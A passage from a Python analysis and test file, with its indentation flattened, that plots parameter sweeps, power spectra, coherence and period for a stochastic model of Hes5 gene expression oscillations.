reference_indices['protein_degradation_rate'] = 15
reference_indices['hill_coefficient'] = 15
parameter_indices = dict()
parameter_indices['basal_transcription_rate'] = 0
parameter_indices['translation_rate'] = 1
parameter_indices['repression_threshold'] = 2
parameter_indices['time_delay'] = 3
reference_parameters = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'all_relative_parameter_sweeps_' + parameter_name + '.npy'))
my_parameter_sweep_results = my_parameter_sweep_results[other_accepted_indices]
increase_indices = np.where(my_parameter_sweep_results[:,10,4] <
my_parameter_sweep_results[:,reference_indices[parameter_name],4])
my_parameter_sweep_results = my_parameter_sweep_results[increase_indices]
my_figure = plt.figure( figsize = (6.5, 1.5) )
this_axis = my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
this_axis.set_ylim(0,0.4)
this_axis = my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
this_axis.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_ylim(0,15)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Expression/1e4')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','multiple_relative_sweep_coherence_increases_' + parameter_name + '.pdf'))
def xest_plot_all_parameter_variation(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,0]<10))))) #transcription_rate
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
# my_parameter_sweep_results = hes5.conduct_protein_degradation_sweep_at_parameters(my_posterior_samples,
# number_of_parameter_points,
# number_of_trajectories)
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'Transcription rate [1/min]'
x_labels['translation_rate'] = 'Translation rate [1/min]'
x_labels['repression_threshold'] = 'Repression threshold/1e4'
x_labels['time_delay'] = 'Transcription delay [min]'
x_labels['mRNA_degradation_rate'] = 'mRNA degradation [1/min]'
x_labels['protein_degradation_rate'] = 'Protein degradation [1/min]'
x_labels['hill_coefficient'] = 'Hill coefficient'
parameter_indices = dict()
parameter_indices['basal_transcription_rate'] = 0
parameter_indices['translation_rate'] = 1
parameter_indices['repression_threshold'] = 2
parameter_indices['time_delay'] = 3
reference_parameters = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'all_parameter_sweeps_' + parameter_name + '.npy'))
if parameter_name == 'repression_threshold':
my_parameter_sweep_results[:,:,0] /= 10000
my_posterior_samples[:,2] /= 10000
my_figure = plt.figure( figsize = (6.5, 1.5) )
my_figure2 = plt.figure( figsize = (6.5, 1.5) )
this_axis = my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.05)
if parameter_name == 'protein_degradation_rate':
this_axis.axvline( np.log(2)/90 )
elif parameter_name == 'mRNA_degradation_rate':
this_axis.axvline( np.log(2)/30 )
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
this_axis.set_ylim(0,700)
this_axis = my_figure2.add_subplot(131)
for results_index, results_table in enumerate(my_parameter_sweep_results):
if parameter_name == 'protein_degradation_rate':
this_parameter = np.log(2)/90
elif parameter_name == 'mRNA_degradation_rate':
this_parameter = np.log(2)/30
elif parameter_name == 'hill_coefficient':
this_parameter = 5
else:
this_parameter = my_posterior_samples[results_index, parameter_indices[parameter_name]]
this_axis.plot(results_table[:,0] - this_parameter,
results_table[:,3], color ='black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(r'$\Delta$' + x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.05)
if parameter_name == 'protein_degradation_rate':
this_axis.axvline( np.log(2)/90 )
elif parameter_name == 'mRNA_degradation_rate':
this_axis.axvline( np.log(2)/30 )
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
this_axis.set_ylim(0,1)
this_axis = my_figure2.add_subplot(132)
for results_index, results_table in enumerate(my_parameter_sweep_results):
if parameter_name == 'protein_degradation_rate':
this_parameter = np.log(2)/90
elif parameter_name == 'mRNA_degradation_rate':
this_parameter = np.log(2)/30
elif parameter_name == 'hill_coefficient':
this_parameter = 5
else:
this_parameter = my_posterior_samples[results_index, parameter_indices[parameter_name]]
this_axis.plot(results_table[:,0] - this_parameter,
results_table[:,4], color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(r'$\Delta$' + x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
this_axis.set_ylim(0,1)
this_axis = my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
this_axis.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
if parameter_name == 'protein_degradation_rate':
this_axis.axvline( np.log(2)/90 )
elif parameter_name == 'mRNA_degradation_rate':
this_axis.axvline( np.log(2)/30 )
this_axis.set_ylim(0,15)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Expression/1e4')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','multiple_sweep_' + parameter_name + '.pdf'))
this_axis = my_figure2.add_subplot(133)
for results_index, results_table in enumerate(my_parameter_sweep_results):
if parameter_name == 'protein_degradation_rate':
this_parameter = np.log(2)/90
elif parameter_name == 'mRNA_degradation_rate':
this_parameter = np.log(2)/30
elif parameter_name == 'hill_coefficient':
this_parameter = 5
else:
this_parameter = my_posterior_samples[results_index, parameter_indices[parameter_name]]
this_axis.errorbar(results_table[:,0] - this_parameter,
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_ylim(0,15)
this_axis.set_xlabel(r'$\Delta$' + x_labels[parameter_name])
this_axis.set_ylabel('Expression/1e4')
my_figure2.tight_layout()
my_figure2.savefig(os.path.join(os.path.dirname(__file__),
'output','multiple_centered_sweep_' + parameter_name + '.pdf'))
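# my_figure2 above centres each sweep by subtracting the sample's own
# reference parameter, so sweeps from different posterior samples share a
# common Delta axis. A two-line sketch of the shift (hypothetical names):
def centre_sweep_sketch(results_table, reference_value):
    centred_x_values = results_table[:,0] - reference_value
    return centred_x_values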
def xest_approximate_power_spectrum_numerically(self):
trace_and_repetition_numbers = np.array([[200,1],
[200,2],
[200,3],
# [100,5]])
[200,4],
[200,5],
[200,6],
[200,7],
[200,8],
[200,9],
[1000,10],
[1000,20]])
power_spectra = []
smoothened_power_spectra = []
coherences = np.zeros(trace_and_repetition_numbers.shape[0])
periods = np.zeros(trace_and_repetition_numbers.shape[0])
index = 0
for number_of_traces, repetition_number in trace_and_repetition_numbers:
print(number_of_traces)
print(repetition_number)
these_mrna_traces, these_protein_trajectories = hes5.generate_multiple_langevin_trajectories( number_of_trajectories = number_of_traces,
duration = 1500*repetition_number,
repression_threshold = 31400,
mRNA_degradation_rate = np.log(2)/30,
protein_degradation_rate = np.log(2)/90,
basal_transcription_rate = 11,
translation_rate = 29,
transcription_delay = 29,
initial_mRNA = 3,
initial_protein = 31400,
equilibration_time = 1000)
this_power_spectrum, this_coherence, this_period = hes5.calculate_power_spectrum_of_trajectories(these_protein_trajectories)
this_smoothened_power_spectrum = hes5.smoothen_power_spectrum(this_power_spectrum)
power_spectra.append(this_power_spectrum)
smoothened_power_spectra.append(this_smoothened_power_spectrum)
coherences[index] = this_coherence
periods[index] = this_period
index += 1
# theoretical_power_spectrum = hes5.calculate_theoretical_power_spectrum_at_parameter_point(
# basal_transcription_rate = 11,
# translation_rate = 29,
# repression_threshold = 31400,
# transcription_delay = 29,
# mRNA_degradation_rate = np.log(2)/30,
# hill_coefficient = 5,
# protein_degradation_rate = np.log(2)/90)
#
figuresize = (6,2.5)
my_figure = plt.figure(figsize = figuresize)
my_figure.add_subplot(131)
for counter, power_spectrum in enumerate(power_spectra):
if counter == 4:
plt.plot(power_spectrum[:,0],power_spectrum[:,1]+counter*200, color = 'green', alpha = 0.8)
elif counter > 6:
plt.plot(power_spectrum[:,0],power_spectrum[:,1]+counter*200, color = 'blue')
else:
plt.plot(power_spectrum[:,0],power_spectrum[:,1]+counter*200, color = 'black', alpha = 0.8)
# plt.plot(theoretical_power_spectrum[:,0],theoretical_power_spectrum[:,1], color = 'blue', alpha = 0.8)
plt.plot(smoothened_power_spectra[counter][:,0],
smoothened_power_spectra[counter][:,1]+counter*200, color = 'grey', alpha = 0.8)
plt.xlim(0.000,0.01)
# plt.ylim(0,100)
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.xlabel('Frequency')
plt.ylabel('Power + offset')
my_figure.add_subplot(132)
plt.plot(trace_and_repetition_numbers[:,1], coherences, color = 'black')
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.axvline(5, color = 'green')
plt.ylim(0,0.5)
plt.xlabel('Trace length [multiples of 1500 min]')
plt.ylabel('Coherence estimate')
my_figure.add_subplot(133)
plt.plot(trace_and_repetition_numbers[:,1], periods, color = 'black')
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.ylim(200,300)
plt.axvline(5, color = 'green')
plt.xlabel('Trace length [multiples of 1500 min]')
plt.ylabel('Period estimate')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','Coherence_measure_test.pdf'))
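# The grey curves above come from hes5.smoothen_power_spectrum; a plausible
# stand-in is a simple moving average over the power column (an assumption,
# not the module's actual implementation). Averaging over more repetitions or
# smoothing the periodogram both reduce its variance, which is why the
# coherence and period estimates settle as the traces get longer.
def smoothen_power_spectrum_sketch(power_spectrum, window_size = 9):
    import numpy as np
    kernel = np.ones(window_size)/window_size
    smoothed_power = np.convolve(power_spectrum[:,1], kernel, mode = 'same')
    return np.column_stack((power_spectrum[:,0], smoothed_power))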
def xest_plot_multiple_parameter_variation_differently(self):
number_of_parameter_points = 20
number_of_trajectories = 100
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_100reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'multiple_degradation_sweep_results.npy'))
# Find all samples whose coherence is below 0.1 at the degradation rate
# closest to log(2)/90, i.e. at entry three of the sweep results
small_coherence_indices, = np.where(my_parameter_sweep_results[:,3,4] < 0.1)
small_coherence_index = small_coherence_indices[0]
this_small_coherence_parameter = my_posterior_samples[small_coherence_index]
extra_large_coherence_indices, = np.where(my_parameter_sweep_results[:,2,4]>0.1)
extra_large_coherence_index = extra_large_coherence_indices[0]
this_extra_large_coherence_parameter = my_posterior_samples[extra_large_coherence_index]
large_coherence_indices = list( set( range(my_parameter_sweep_results.shape[0])) -
set( small_coherence_indices).union(
set( extra_large_coherence_indices ))
)
large_coherence_index = large_coherence_indices[3]
this_large_coherence_parameter = my_posterior_samples[large_coherence_index]
my_figure = plt.figure( figsize = (6.5, 3.5) )
my_figure.add_subplot(231)
for parameter_index, results_table in enumerate(my_parameter_sweep_results):
if parameter_index in small_coherence_indices:
plt.plot(results_table[:,0],
results_table[:,3], color ='purple', alpha = 0.1)
elif parameter_index in extra_large_coherence_indices:
plt.plot(results_table[:,0],
results_table[:,3], color ='blue', alpha = 0.1)
else:
plt.plot(results_table[:,0],
results_table[:,3], color ='green', alpha = 0.01)
plt.plot(my_parameter_sweep_results[large_coherence_index,:,0],
my_parameter_sweep_results[large_coherence_index,:,3], color ='green')
plt.plot(my_parameter_sweep_results[extra_large_coherence_index,:,0],
my_parameter_sweep_results[extra_large_coherence_index,:,3], color ='blue')
plt.plot(my_parameter_sweep_results[small_coherence_index,:,0],
my_parameter_sweep_results[small_coherence_index,:,3], color ='purple')
plt.axvline( np.log(2)/90 )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.xlabel('Hes5 degradation [1/min]')
plt.ylabel('Period [min]')
plt.ylim(0,700)
my_figure.add_subplot(232)
for parameter_index, results_table in enumerate(my_parameter_sweep_results):
if parameter_index in small_coherence_indices:
plt.plot(results_table[:,0],
results_table[:,4], color = 'purple', alpha = 0.1)
elif parameter_index in extra_large_coherence_indices:
plt.plot(results_table[:,0],
results_table[:,4], color = 'blue', alpha = 0.1)
else:
plt.plot(results_table[:,0],
results_table[:,4], color = 'green', alpha = 0.01)
plt.plot(my_parameter_sweep_results[large_coherence_index,:,0],
my_parameter_sweep_results[large_coherence_index,:,4], color = 'green')
plt.plot(my_parameter_sweep_results[extra_large_coherence_index,:,0],
my_parameter_sweep_results[extra_large_coherence_index,:,4], color = 'blue')
plt.plot(my_parameter_sweep_results[small_coherence_index,:,0],
my_parameter_sweep_results[small_coherence_index,:,4], color = 'purple')
plt.axvline( np.log(2)/90 )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.xlabel('Hes5 degradation [1/min]')
plt.ylabel('Coherence')
plt.ylim(0,1)
my_figure.add_subplot(233)
for parameter_index, results_table in enumerate(my_parameter_sweep_results):
if parameter_index in small_coherence_indices:
plt.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000,
color = 'purple', alpha = 0.1)
elif parameter_index in extra_large_coherence_indices:
plt.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000,
color = 'blue', alpha = 0.1)
else:
plt.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000,
color = 'green', alpha = 0.01)
plt.errorbar(my_parameter_sweep_results[extra_large_coherence_index,:,0],
my_parameter_sweep_results[extra_large_coherence_index,:,1]/10000,
yerr = my_parameter_sweep_results[extra_large_coherence_index,:,2]/10000,
color = 'blue')
plt.errorbar(my_parameter_sweep_results[large_coherence_index,:,0],
my_parameter_sweep_results[large_coherence_index,:,1]/10000,
yerr = my_parameter_sweep_results[large_coherence_index,:,2]/10000,
color = 'green')
plt.errorbar(my_parameter_sweep_results[small_coherence_index,:,0],
my_parameter_sweep_results[small_coherence_index,:,1]/10000,
yerr = my_parameter_sweep_results[small_coherence_index,:,2]/10000,
color = 'purple')
plt.axvline( np.log(2)/90 )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.ylim(0,15)
plt.xlabel('Hes5 degradation [1/min]')
plt.ylabel('Expression/1e4')
my_figure.add_subplot(234)
this_small_trace = hes5.generate_langevin_trajectory( duration = 1500,
repression_threshold = this_small_coherence_parameter[2],
basal_transcription_rate = this_small_coherence_parameter[0],
translation_rate = this_small_coherence_parameter[1],
initial_mRNA = 10.0,
transcription_delay = this_small_coherence_parameter[3],
initial_protein = this_small_coherence_parameter[2],
equilibration_time = 1000.0 )
plt.plot( this_small_trace[:,0]/100, this_small_trace[:,2]/10000, color = 'purple')
plt.text(0.1, 0.2, r'$\alpha_m =$ ' + '{:.2f}'.format(this_small_coherence_parameter[0]) +
r', $\alpha_p =$ ' + '{:.2f}'.format(this_small_coherence_parameter[1]) +
'\n' + r'$p_0 = $ ' + '{:.2f}'.format(this_small_coherence_parameter[2]) +
r', $\tau = $ ' + '{:.2f}'.format(this_small_coherence_parameter[3]),
fontsize = 5,
transform=plt.gca().transAxes)
plt.ylim(0,10)
plt.xlabel('Time [100min]')
plt.ylabel('Expression/1e4')
my_figure.add_subplot(235)
this_large_trace = hes5.generate_langevin_trajectory( duration = 1500,
repression_threshold = this_large_coherence_parameter[2],
basal_transcription_rate = this_large_coherence_parameter[0],
translation_rate = this_large_coherence_parameter[1],
initial_mRNA = 10.0,
transcription_delay = this_large_coherence_parameter[3],
initial_protein = this_large_coherence_parameter[2],
equilibration_time = 1000.0 )
plt.plot( this_large_trace[:,0]/100, this_large_trace[:,2]/10000, color = 'green')
plt.text(0.1, 0.2, r'$\alpha_m =$ ' + '{:.2f}'.format(this_large_coherence_parameter[0]) +
r', $\alpha_p =$ ' + '{:.2f}'.format(this_large_coherence_parameter[1]) +
'\n' + r'$p_0 = $ ' + '{:.2f}'.format(this_large_coherence_parameter[2]) +
r', $\tau = $ ' + '{:.2f}'.format(this_large_coherence_parameter[3]),
fontsize = 5,
transform=plt.gca().transAxes)
plt.ylim(0,10)
plt.xlabel('Time [100min]')
plt.ylabel('Expression/1e4')
my_figure.add_subplot(236)
this_extra_large_trace = hes5.generate_langevin_trajectory( duration = 1500,
repression_threshold = this_extra_large_coherence_parameter[2],
basal_transcription_rate = this_extra_large_coherence_parameter[0],
translation_rate = this_extra_large_coherence_parameter[1],
initial_mRNA = 10.0,
transcription_delay = this_extra_large_coherence_parameter[3],
initial_protein = this_extra_large_coherence_parameter[2],
equilibration_time = 1000.0 )
plt.plot( this_extra_large_trace[:,0]/100, this_extra_large_trace[:,2]/10000, color = 'blue')
plt.text(0.1, 0.2, r'$\alpha_m =$ ' + '{:.2f}'.format(this_extra_large_coherence_parameter[0]) +
r', $\alpha_p =$ ' + '{:.2f}'.format(this_extra_large_coherence_parameter[1]) +
'\n' + r'$p_0 = $ ' + '{:.2f}'.format(this_extra_large_coherence_parameter[2]) +
r', $\tau = $ ' + '{:.2f}'.format(this_extra_large_coherence_parameter[3]),
fontsize = 5,
transform=plt.gca().transAxes)
plt.ylim(0,10)
plt.xlabel('Time [100min]')
plt.ylabel('Expression/1e4')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','multiple_degradation_sweep_examples.pdf'))
def xest_validation_at_low_transcription_rates(self):
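# Summary: for the accepted parameter points with the lowest basal
# transcription rates, compare full stochastic (black, labelled 'Gillespie'
# in the figure), langevin (green) and theoretical/LNA (blue) power spectra,
# coherences and periods side by side.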
# pick parameter values with low transcription rates (and hence low mRNA) and plot example mRNA and protein traces and power spectra
saving_path = os.path.join(os.path.dirname(__file__), 'data','sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
number_of_traces = 200
repetition_factor = 5
# number_of_traces = 4
# repetition_factor = 1
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,0]<2))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
my_results = model_results[accepted_indices]
lowest_indices = np.argsort(my_posterior_samples[:,0])
# import pdb; pdb.set_trace()
##
# first_samples
##
first_parameter = my_posterior_samples[lowest_indices[0]]
print(first_parameter)
first_mRNA_trajectories, first_protein_trajectories = hes5.generate_multiple_trajectories( number_of_trajectories = number_of_traces,
duration = 1500*repetition_factor,
repression_threshold = first_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = first_parameter[3],
basal_transcription_rate = first_parameter[0],
translation_rate = first_parameter[1],
initial_mRNA = 10,
initial_protein = first_parameter[2],
equilibration_time = 1000,
synchronize = False )
first_langevin_mRNA_trajectories, first_langevin_protein_trajectories = hes5.generate_multiple_langevin_trajectories( number_of_trajectories = number_of_traces,
duration = 1500*repetition_factor,
repression_threshold = first_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = first_parameter[3],
basal_transcription_rate = first_parameter[0],
translation_rate = first_parameter[1],
initial_mRNA = 10,
initial_protein = first_parameter[2],
equilibration_time = 1000)
first_theoretical_power_spectrum = hes5.calculate_theoretical_power_spectrum_at_parameter_point(
repression_threshold = first_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = first_parameter[3],
basal_transcription_rate = first_parameter[0],
translation_rate = first_parameter[1]
)
first_theoretical_coherence, first_theoretical_period = hes5.calculate_coherence_and_period_of_power_spectrum(first_theoretical_power_spectrum)
first_power_spectrum, first_coherence, first_period = hes5.calculate_power_spectrum_of_trajectories(first_protein_trajectories)
first_langevin_power_spectrum, first_langevin_coherence, first_langevin_period = hes5.calculate_power_spectrum_of_trajectories(first_langevin_protein_trajectories)
figuresize = (6,10)
my_figure = plt.figure(figsize = figuresize)
my_figure.add_subplot(521)
plt.plot( first_mRNA_trajectories[:,0],
first_mRNA_trajectories[:,1]*0.1, label = 'mRNA example*1000', color = 'black',
lw = 0.5 )
plt.plot( first_protein_trajectories[:,0],
first_protein_trajectories[:,1]/10000, label = 'Protein example', color = 'black', ls = '--',
lw = 0.5, dashes = [1,1] )
plt.plot( first_langevin_mRNA_trajectories[:,0],
first_langevin_mRNA_trajectories[:,1]*0.1, label = 'mRNA example*1000', color = 'green',
lw = 0.5 )
plt.plot( first_langevin_protein_trajectories[:,0],
first_langevin_protein_trajectories[:,1]/10000, label = 'Protein example', color = 'green', ls = '--',
lw = 0.5, dashes = [1,1] )
plt.text(0.1, 0.3, r'$\alpha_m =$ ' + '{:.2f}'.format(first_parameter[0]) +
r', $\alpha_p =$ ' + '{:.2f}'.format(first_parameter[1]) +
'\n' + r'$p_0 = $ ' + '{:.2f}'.format(first_parameter[2]) +
r', $\tau = $ ' + '{:.2f}'.format(first_parameter[3]),
fontsize = 5,
transform=plt.gca().transAxes)
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.xlabel('Time [min]')
plt.ylabel('Copy number [1e4]')
plt.ylim(0,9)
plt.xlim(0,1500)
# plt.legend()
my_figure.add_subplot(522)
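# overlay the power spectrum of each individual trajectory as a faint line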
for trajectory in first_protein_trajectories[:,1:].transpose():
compound_trajectory = np.vstack((first_protein_trajectories[:,0],trajectory)).transpose()
this_power_spectrum,_,_ = hes5.calculate_power_spectrum_of_trajectory(compound_trajectory)
plt.plot(this_power_spectrum[:,0],this_power_spectrum[:,1], color = 'black', alpha = 0.01)
plt.plot(first_power_spectrum[:,0],
first_power_spectrum[:,1], color = 'black')
plt.plot(first_langevin_power_spectrum[:,0],
first_langevin_power_spectrum[:,1], color = 'green')
plt.plot(first_theoretical_power_spectrum[:,0],
first_theoretical_power_spectrum[:,1], color = 'blue')
plt.xlim(0,0.01)
# plt.ylim(0,100)
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.xlabel('Frequency')
plt.ylabel('Occurrence')
# import pdb; pdb.set_trace()
plt.text(0.95, 0.95, 'Coherence:\n' + "{:.2f}".format(first_coherence) + ' ' +
"{:.2f}".format(first_langevin_coherence) + ' ' +
"{:.2f}".format(first_theoretical_coherence) +
'\nPeriod:\n' + "{:.2f}".format(first_period) + ' ' +
"{:.2f}".format(first_langevin_period) + ' ' +
"{:.2f}".format(first_theoretical_period),
verticalalignment='top', horizontalalignment='right',
transform=plt.gca().transAxes,
fontsize = 5)
##
# Hes5 samples
##
second_parameter = my_posterior_samples[lowest_indices[1]]
second_mRNA_trajectories, second_protein_trajectories = hes5.generate_multiple_trajectories( number_of_trajectories = number_of_traces,
duration = 1500*repetition_factor,
repression_threshold = second_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = second_parameter[3],
basal_transcription_rate = second_parameter[0],
translation_rate = second_parameter[1],
initial_mRNA = 10,
initial_protein = second_parameter[2],
equilibration_time = 1000,
synchronize = False )
second_langevin_mRNA_trajectories, second_langevin_protein_trajectories = hes5.generate_multiple_langevin_trajectories( number_of_trajectories = number_of_traces,
duration = 1500*repetition_factor,
repression_threshold = second_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = second_parameter[3],
basal_transcription_rate = second_parameter[0],
translation_rate = second_parameter[1],
initial_mRNA = 10,
initial_protein = second_parameter[2],
equilibration_time = 1000)
second_theoretical_power_spectrum = hes5.calculate_theoretical_power_spectrum_at_parameter_point(
repression_threshold = second_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = second_parameter[3],
basal_transcription_rate = second_parameter[0],
translation_rate = second_parameter[1]
)
second_theoretical_coherence, second_theoretical_period = hes5.calculate_coherence_and_period_of_power_spectrum(second_theoretical_power_spectrum)
second_power_spectrum, second_coherence, second_period = hes5.calculate_power_spectrum_of_trajectories(second_protein_trajectories)
second_langevin_power_spectrum, second_langevin_coherence, second_langevin_period = hes5.calculate_power_spectrum_of_trajectories(second_langevin_protein_trajectories)
my_figure.add_subplot(523)
mrna_example, = plt.plot( second_mRNA_trajectories[:,0],
second_mRNA_trajectories[:,1]*0.1, label = 'mRNA example*1000', color = 'black',
lw = 0.5 )
protein_example, = plt.plot( second_protein_trajectories[:,0],
second_protein_trajectories[:,1]/10000, label = 'Protein example', color = 'black', ls = '--',
lw = 0.5, dashes = [1,1] )
plt.plot( second_langevin_mRNA_trajectories[:,0],
second_langevin_mRNA_trajectories[:,1]*0.1, label = 'mRNA example*1000', color = 'green',
lw = 0.5 )
plt.plot( second_langevin_protein_trajectories[:,0],
second_langevin_protein_trajectories[:,1]/10000, label = 'Protein example', color = 'green', ls = '--',
lw = 0.5, dashes = [1,1] )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.text(0.1, 0.25, r'$\alpha_m =$ ' + '{:.2f}'.format(second_parameter[0]) +
r', $\alpha_p =$ ' + '{:.2f}'.format(second_parameter[1]) +
'\n' + r'$p_0 = $ ' + '{:.2f}'.format(second_parameter[2]) +
r', $\tau = $ ' + '{:.2f}'.format(second_parameter[3]),
fontsize = 5,
transform=plt.gca().transAxes)
plt.xlabel('Time [min]')
plt.ylabel('Copy number [1e4]')
plt.ylim(0,9)
plt.xlim(0,1500)
# plt.legend()
my_figure.add_subplot(524)
for trajectory in second_protein_trajectories[:,1:].transpose():
compound_trajectory = np.vstack((second_protein_trajectories[:,0],trajectory)).transpose()
this_power_spectrum,_,_ = hes5.calculate_power_spectrum_of_trajectory(compound_trajectory)
plt.plot(this_power_spectrum[:,0],this_power_spectrum[:,1], color = 'black', alpha = 0.01)
plt.plot(second_power_spectrum[:,0],
second_power_spectrum[:,1], color = 'black')
plt.plot(second_langevin_power_spectrum[:,0],
second_langevin_power_spectrum[:,1], color = 'green')
plt.plot(second_theoretical_power_spectrum[:,0],
second_theoretical_power_spectrum[:,1], color = 'blue')
plt.xlim(0,0.01)
# plt.ylim(0,100)
plt.xlabel('Frequency')
plt.ylabel('Occurrence')
plt.gca().locator_params(axis='x', tight = True, nbins=4)
# import pdb; pdb.set_trace()
plt.text(0.95, 0.95, 'Coherence:\n' + "{:.2f}".format(second_coherence) + ' ' +
"{:.2f}".format(second_langevin_coherence) + ' ' +
"{:.2f}".format(second_theoretical_coherence) +
'\nPeriod:\n' + "{:.2f}".format(second_period) + ' ' +
"{:.2f}".format(second_langevin_period) + ' ' +
"{:.2f}".format(second_theoretical_period),
verticalalignment='top',
fontsize = 5,
horizontalalignment='right',
transform=plt.gca().transAxes)
##
# third example
##
# generate the random samples:
third_parameter = my_posterior_samples[lowest_indices[2]]
third_mRNA_trajectories, third_protein_trajectories = hes5.generate_multiple_trajectories( number_of_trajectories = number_of_traces,
duration = 1500*repetition_factor,
